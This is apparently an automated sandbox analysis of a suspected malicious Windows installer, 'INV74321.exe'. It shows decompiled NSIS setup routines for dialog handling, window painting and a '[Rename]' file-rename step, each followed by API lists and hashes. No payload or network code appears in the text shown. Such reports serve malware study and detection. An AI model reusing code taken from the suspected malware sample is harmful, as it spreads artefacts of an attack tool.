                                                          					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
                                                          					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
                                                          					 *0x42a87c =  *0x42a87c | 0xffffffff;
                                                          					_v16 = _t264;
                                                          					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
                                                          					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                          					 *0x42a874 = _t266;
                                                          					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                          					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                          						SendMessageA(_v8, 0x111b, _t320, 0);
                                                          					}
                                                          					DeleteObject(_v16);
                                                          					_t327 = 0;
                                                          					do {
                                                          						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                          						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                          							if(_t327 != 0x20) {
                                                          								_v20 = 0;
                                                          							}
                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
                                                          						}
                                                          						_t327 = _t327 + 1;
                                                          					} while (_t327 < 0x21);
                                                          					_t328 = _a16;
                                                          					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                          					_push(0x15);
                                                          					E0040417B(_a4);
                                                          					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                          					_push(0x16);
                                                          					E0040417B(_a4);
                                                          					_t329 = 0;
                                                          					_v16 = 0;
                                                          					if( *0x42f46c <= 0) {
                                                          						L19:
                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                          						goto L20;
                                                          					} else {
                                                          						_t316 = _v24 + 8;
                                                          						_v32 = _t316;
                                                          						do {
                                                          							_t284 =  &(_t316[0x10]);
                                                          							if( *_t284 != 0) {
                                                          								_v64 = _t284;
                                                          								_t285 =  *_t316;
                                                          								_v88 = _v16;
                                                          								_t308 = 0x20;
                                                          								_v84 = 0xffff0002;
                                                          								_v80 = 0xd;
                                                          								_v68 = _t308;
                                                          								_v44 = _t329;
                                                          								_v72 = _t285 & _t308;
                                                          								if((_t285 & 0x00000002) == 0) {
                                                          									if((_t285 & 0x00000004) == 0) {
                                                          										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                          									} else {
                                                          										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                          									}
                                                          								} else {
                                                          									_v80 = 0x4d;
                                                          									_v48 = 1;
                                                          									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                          									_v36 = 1;
                                                          									 *( *0x42a888 + _t329 * 4) = _t290;
                                                          									_v16 =  *( *0x42a888 + _t329 * 4);
                                                          								}
                                                          							}
                                                          							_t329 = _t329 + 1;
                                                          							_t316 =  &(_v32[0x418]);
                                                          							_v32 = _t316;
                                                          						} while (_t329 <  *0x42f46c);
                                                          						if(_v36 != 0) {
                                                          							L20:
                                                          							if(_v20 != 0) {
                                                          								E004041B0(_v8);
                                                          								goto L23;
                                                          							} else {
                                                          								ShowWindow(_v12, 5);
                                                          								E004041B0(_v12);
                                                          								L93:
                                                          								return E004041E2(_a8, _a12, _a16);
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}

                                                          0x00000000
                                                          0x00405006
                                                          0x00405011
                                                          0x00405014
                                                          0x00405019
                                                          0x0040501b
                                                          0x0040501f
                                                          0x0040502f
                                                          0x00405039
                                                          0x0040503b
                                                          0x0040503e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405021
                                                          0x00405021
                                                          0x00405027
                                                          0x00405029
                                                          0x00405029
                                                          0x0040502a
                                                          0x0040502b
                                                          0x00000000
                                                          0x00405021
                                                          0x00405004
                                                          0x00404fdf
                                                          0x00404f22
                                                          0x00000000
                                                          0x00404f38
                                                          0x00404f42
                                                          0x00404f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00404f59
                                                          0x00404f5e
                                                          0x00404f6a
                                                          0x00404f6a
                                                          0x00404f6c
                                                          0x00404f7b
                                                          0x00404f7d
                                                          0x00404f81
                                                          0x00404f84
                                                          0x00000000
                                                          0x00404f84
                                                          0x00404f22
                                                          0x00404bd6
                                                          0x00404bd9
                                                          0x00404bdc
                                                          0x00404bec
                                                          0x00404bff
                                                          0x00404c0a
                                                          0x00404c10
                                                          0x00404c1e
                                                          0x00404c31
                                                          0x00404c36
                                                          0x00404c41
                                                          0x00404c4a
                                                          0x00404c60
                                                          0x00404c70
                                                          0x00404c7c
                                                          0x00404c7c
                                                          0x00404c81
                                                          0x00404c87
                                                          0x00404c89
                                                          0x00404c8c
                                                          0x00404c91
                                                          0x00404c96
                                                          0x00404c98
                                                          0x00404c98
                                                          0x00404cb8
                                                          0x00404cb8
                                                          0x00404cba
                                                          0x00404cbb
                                                          0x00404cc0
                                                          0x00404cc6
                                                          0x00404cca
                                                          0x00404ccf
                                                          0x00404cd7
                                                          0x00404cdb
                                                          0x00404ce0
                                                          0x00404ce5
                                                          0x00404ced
                                                          0x00404cf0
                                                          0x00404dbf
                                                          0x00404dd2
                                                          0x00000000
                                                          0x00404cf6
                                                          0x00404cf9
                                                          0x00404cfc
                                                          0x00404cff
                                                          0x00404cff
                                                          0x00404d04
                                                          0x00404d0d
                                                          0x00404d10
                                                          0x00404d14
                                                          0x00404d17
                                                          0x00404d1a
                                                          0x00404d23
                                                          0x00404d2c
                                                          0x00404d2f
                                                          0x00404d32
                                                          0x00404d35
                                                          0x00404d73
                                                          0x00404d9e
                                                          0x00404d75
                                                          0x00404d84
                                                          0x00404d84
                                                          0x00404d37
                                                          0x00404d3a
                                                          0x00404d48
                                                          0x00404d52
                                                          0x00404d5a
                                                          0x00404d61
                                                          0x00404d6c
                                                          0x00404d6c
                                                          0x00404d35
                                                          0x00404da4
                                                          0x00404da5
                                                          0x00404db1
                                                          0x00404db1
                                                          0x00404dbd
                                                          0x00404dd8
                                                          0x00404ddb
                                                          0x00404df8
                                                          0x00000000
                                                          0x00404ddd
                                                          0x00404de2
                                                          0x00404deb
                                                          0x0040517d
                                                          0x0040518f
                                                          0x0040518f
                                                          0x00404ddb
                                                          0x00000000
                                                          0x00404dbd
                                                          0x00404cf0

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00404B97
                                                          • GetDlgItem.USER32 ref: 00404BA4
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                          • LoadImageA.USER32 ref: 00404C0A
                                                          • SetWindowLongA.USER32 ref: 00404C24
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                          • DeleteObject.GDI32(00000110), ref: 00404C81
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                          • GetWindowLongA.USER32 ref: 00404DC4
                                                          • SetWindowLongA.USER32 ref: 00404DD2
                                                          • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                          • GlobalFree.KERNEL32 ref: 00404FC0
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                          • ShowWindow.USER32(?,00000000), ref: 00405169
                                                          • GetDlgItem.USER32 ref: 00405174
                                                          • ShowWindow.USER32(00000000), ref: 0040517B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                          • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                          • Opcode Fuzzy Hash: 05a311050dda4b414fd1261923b8e6b7691581466e425b0fd9ae4ea99a1d7fb6
                                                          • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E004042E6(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                          				intOrPtr _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				struct HWND__* _t52;
                                                          				long _t86;
                                                          				int _t98;
                                                          				struct HWND__* _t99;
                                                          				signed int _t100;
                                                          				intOrPtr _t107;
                                                          				intOrPtr _t109;
                                                          				int _t110;
                                                          				signed int* _t112;
                                                          				signed int _t113;
                                                          				char* _t114;
                                                          				CHAR* _t115;
                                                          
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 != 0x111) {
                                                          						L11:
                                                          						if(_a8 != 0x4e) {
                                                          							if(_a8 == 0x40b) {
                                                          								 *0x42985c =  *0x42985c + 1;
                                                          							}
                                                          							L25:
                                                          							_t110 = _a16;
                                                          							L26:
                                                          							return E004041E2(_a8, _a12, _t110);
                                                          						}
                                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                                          						_t110 = _a16;
                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                          							_v12 = _t100;
                                                          							_v16 = _t109;
                                                          							_v8 = 0x42e3c0;
                                                          							if(_t100 - _t109 < 0x800) {
                                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                          								SetCursor(LoadCursorA(0, 0x7f02));
                                                          								_push(1);
                                                          								E0040458A(_a4, _v8);
                                                          								SetCursor(LoadCursorA(0, 0x7f00));
                                                          								_t110 = _a16;
                                                          							}
                                                          						}
                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                          							goto L26;
                                                          						} else {
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                          								SendMessageA( *0x42f428, 0x111, 1, 0);
                                                          							}
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                          								SendMessageA( *0x42f428, 0x10, 0, 0);
                                                          							}
                                                          							return 1;
                                                          						}
                                                          					}
                                                          					if(_a12 >> 0x10 != 0 ||  *0x42985c != 0) {
                                                          						goto L25;
                                                          					} else {
                                                          						_t112 =  *0x42a068 + 0x14;
                                                          						if(( *_t112 & 0x00000020) == 0) {
                                                          							goto L25;
                                                          						}
                                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                          						E0040419D(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                          						E00404566();
                                                          						goto L11;
                                                          					}
                                                          				}
                                                          				_t98 = _a16;
                                                          				_t113 =  *(_t98 + 0x30);
                                                          				if(_t113 < 0) {
                                                          					_t107 =  *0x42ebfc; // 0x569dca
                                                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                          				}
                                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                          				_t114 = _t113 +  *0x42f478;
                                                          				_push(0x22);
                                                          				_a16 =  *_t114;
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_t115 = _t114 + 1;
                                                          				_v16 = _t115;
                                                          				_v8 = E004042B1;
                                                          				E0040417B(_a4);
                                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                          				_push(0x23);
                                                          				E0040417B(_a4);
                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                          				E0040419D( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                          				_t99 = GetDlgItem(_a4, 0x3e8);
                                                          				E004041B0(_t99);
                                                          				SendMessageA(_t99, 0x45b, 1, 0);
                                                          				_t86 =  *( *0x42f434 + 0x68);
                                                          				if(_t86 < 0) {
                                                          					_t86 = GetSysColor( ~_t86);
                                                          				}
                                                          				SendMessageA(_t99, 0x443, 0, _t86);
                                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                          				 *0x42985c = 0;
                                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                          				 *0x42985c = 0;
                                                          				return 0;
                                                          			}



















                                                          APIs
                                                          • CheckDlgButton.USER32 ref: 00404371
                                                          • GetDlgItem.USER32 ref: 00404385
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                          • GetSysColor.USER32(?), ref: 004043B4
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                          • lstrlenA.KERNEL32(?), ref: 004043D5
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                          • GetDlgItem.USER32 ref: 0040445B
                                                          • SendMessageA.USER32(00000000), ref: 0040445E
                                                          • GetDlgItem.USER32 ref: 00404489
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                          • LoadCursorA.USER32 ref: 004044D8
                                                          • SetCursor.USER32(00000000), ref: 004044E1
                                                          • LoadCursorA.USER32 ref: 004044F7
                                                          • SetCursor.USER32(00000000), ref: 004044FA
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                          • String ID: GHFGHFGHFDGDFGDFg$N
                                                          • API String ID: 3103080414-2795107479
                                                          • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                          • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                          • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				struct tagRECT _v32;
                                                          				struct tagPAINTSTRUCT _v96;
                                                          				struct HDC__* _t70;
                                                          				struct HBRUSH__* _t87;
                                                          				struct HFONT__* _t94;
                                                          				long _t102;
                                                          				signed int _t126;
                                                          				struct HDC__* _t128;
                                                          				intOrPtr _t130;
                                                          
                                                          				if(_a8 == 0xf) {
                                                          					_t130 =  *0x42f434;
                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                          					_a8 = _t70;
                                                          					GetClientRect(_a4,  &_v32);
                                                          					_t126 = _v32.bottom;
                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                          					while(_v32.top < _t126) {
                                                          						_a12 = _t126 - _v32.top;
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                          						_v32.bottom = _v32.bottom + 4;
                                                          						_a16 = _t87;
                                                          						FillRect(_a8,  &_v32, _t87);
                                                          						DeleteObject(_a16);
                                                          						_v32.top = _v32.top + 4;
                                                          					}
                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                          						_a16 = _t94;
                                                          						if(_t94 != 0) {
                                                          							_t128 = _a8;
                                                          							_v32.left = 0x10;
                                                          							_v32.top = 8;
                                                          							SetBkMode(_t128, 1);
                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                          							_a8 = SelectObject(_t128, _a16);
                                                          							DrawTextA(_t128, "accumulate Setup", 0xffffffff,  &_v32, 0x820);
                                                          							SelectObject(_t128, _a8);
                                                          							DeleteObject(_a16);
                                                          						}
                                                          					}
                                                          					EndPaint(_a4,  &_v96);
                                                          					return 0;
                                                          				}
                                                          				_t102 = _a16;
                                                          				if(_a8 == 0x46) {
                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
                                                          				}
                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                          			}














                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,accumulate Setup,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F$accumulate Setup
                                                          • API String ID: 941294808-1891751181
                                                          • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                          • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                          • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405D66(void* __ecx) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				long _t12;
                                                          				long _t24;
                                                          				char* _t31;
                                                          				int _t37;
                                                          				void* _t38;
                                                          				intOrPtr* _t39;
                                                          				long _t42;
                                                          				CHAR* _t44;
                                                          				void* _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t52;
                                                          				void* _t53;
                                                          
                                                          				_t38 = __ecx;
                                                          				_t44 =  *(_t52 + 0x14);
                                                          				 *0x42c620 = 0x4c554e;
                                                          				if(_t44 == 0) {
                                                          					L3:
                                                          					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
                                                          						_t53 = _t52 + 0x10;
                                                          						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
                                                          						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
                                                          						_t48 = _t12;
                                                          						 *(_t53 + 0x18) = _t48;
                                                          						if(_t48 != 0xffffffff) {
                                                          							_t42 = GetFileSize(_t48, 0);
                                                          							_t6 = _t37 + 0xa; // 0xa
                                                          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                          							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
                                                          								L18:
                                                          								return CloseHandle(_t48);
                                                          							} else {
                                                          								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
                                                          									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
                                                          									if(_t49 == 0) {
                                                          										_t48 =  *(_t53 + 0x18);
                                                          										L16:
                                                          										_t24 = _t42;
                                                          										L17:
                                                          										E00405C4B(_t24 + _t46, 0x42c220, _t37);
                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                          										E00405D37(_t48, _t46, _t42 + _t37);
                                                          										GlobalFree(_t46);
                                                          										goto L18;
                                                          									}
                                                          									_t39 = _t46 + _t42;
                                                          									_t31 = _t39 + _t37;
                                                          									while(_t39 > _t49) {
                                                          										 *_t31 =  *_t39;
                                                          										_t31 = _t31 - 1;
                                                          										_t39 = _t39 - 1;
                                                          									}
                                                          									_t24 = _t49 - _t46 + 1;
                                                          									_t48 =  *(_t53 + 0x18);
                                                          									goto L17;
                                                          								}
                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                          								_t42 = _t42 + 0xa;
                                                          								goto L16;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					CloseHandle(E00405C90(_t44, 0, 1));
                                                          					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						goto L3;
                                                          					}
                                                          				}
                                                          				return _t12;
                                                          			}




















                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DA0
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                          • GetShortPathNameA.KERNEL32 ref: 00405DBD
                                                          • wsprintfA.USER32 ref: 00405DDB
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                          • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                          • GlobalFree.KERNEL32 ref: 00405EC4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\INV74321.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                          • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                          • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                          • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                          				struct _ITEMIDLIST* _v8;
                                                          				char _v12;
                                                          				signed int _v16;
                                                          				signed char _v20;
                                                          				signed int _v24;
                                                          				signed char _v28;
                                                          				signed int _t38;
                                                          				CHAR* _t39;
                                                          				signed int _t41;
                                                          				char _t52;
                                                          				char _t53;
                                                          				char _t55;
                                                          				char _t57;
                                                          				void* _t65;
                                                          				char* _t66;
                                                          				signed int _t80;
                                                          				intOrPtr _t86;
                                                          				char _t88;
                                                          				void* _t89;
                                                          				CHAR* _t90;
                                                          				void* _t92;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				void* _t100;
                                                          
                                                          				_t92 = __esi;
                                                          				_t89 = __edi;
                                                          				_t65 = __ebx;
                                                          				_t38 = _a8;
                                                          				if(_t38 < 0) {
                                                          					_t86 =  *0x42ebfc; // 0x569dca
                                                          					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                          				}
                                                          				_push(_t65);
                                                          				_push(_t92);
